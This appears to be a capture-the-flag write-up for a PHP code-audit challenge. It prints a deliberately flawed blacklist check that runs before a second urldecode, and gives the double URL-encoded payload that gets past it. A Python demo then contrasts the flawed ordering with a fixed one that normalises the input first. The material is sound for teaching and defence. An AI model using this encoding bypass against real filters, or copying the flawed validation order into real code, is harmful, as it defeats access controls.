bugku - PHP code audit - urldecode double-encoding bypass

Challenge source:

```php
<?php
// Blacklist check runs on $_GET[id], which the web server has already percent-decoded once.
// (eregi() is case-insensitive; it was removed in PHP 7, so this challenge targets PHP 5.)
if(eregi("hackerDJ",$_GET[id])) {
    echo(" not allowed! ");
    exit();
}
// A second percent-decode happens here, after the blacklist has already been applied.
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ") {
    echo " Access granted! ";
    echo " flag ";
}
?>
```

The blacklist is evaluated on the once-decoded value, but the equality check is evaluated on the twice-decoded value, so the two checks do not see the same string. Double URL-encode the value directly; payload: ?id=%2568ackerDJ
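The decoding pipeline behind this bypass, as an added Python simulation that is not part of the original writeup: `flawed_check` mirrors the challenge's order of operations (server decode, blacklist, second `urldecode`, compare), and `fixed_check` is an assumed hardened variant that normalises the input fully before running the blacklist, so both checks operate on the same representation.

```python
from urllib.parse import unquote_plus  # like PHP, treats '+' as a space

BLOCKED = "hackerdj"   # eregi("hackerDJ", ...) is case-insensitive
TARGET = "hackerDJ"


def flawed_check(raw_query_value: str) -> str:
    """Reproduce the challenge logic on the raw query-string bytes."""
    # Step 1: PHP percent-decodes the query string once when filling $_GET.
    once = unquote_plus(raw_query_value)
    # Step 2: the blacklist sees only the once-decoded value.
    if BLOCKED in once.lower():
        return "not allowed!"
    # Step 3: urldecode() decodes a second time, then the equality test runs.
    twice = unquote_plus(once)
    if twice == TARGET:
        return "Access granted!"
    return "denied"


def fixed_check(raw_query_value: str) -> str:
    """Assumed fix: fully normalise first, then apply every check to that value."""
    once = unquote_plus(raw_query_value)
    canonical = unquote_plus(once)          # same decoding depth as the comparison
    if BLOCKED in canonical.lower():        # blacklist now sees what the comparison sees
        return "not allowed!"
    if canonical == TARGET:
        return "Access granted!"
    return "denied"


if __name__ == "__main__":
    # Constructed inputs: plain, singly encoded, and the doubly encoded payload.
    for value in ("hackerDJ", "%68ackerDJ", "%2568ackerDJ"):
        print(f"{value:14} flawed={flawed_check(value):16} fixed={fixed_check(value)}")
```

With the flawed ordering only the doubly encoded form reaches the flag branch; with the normalised check every spelling is caught by the blacklist.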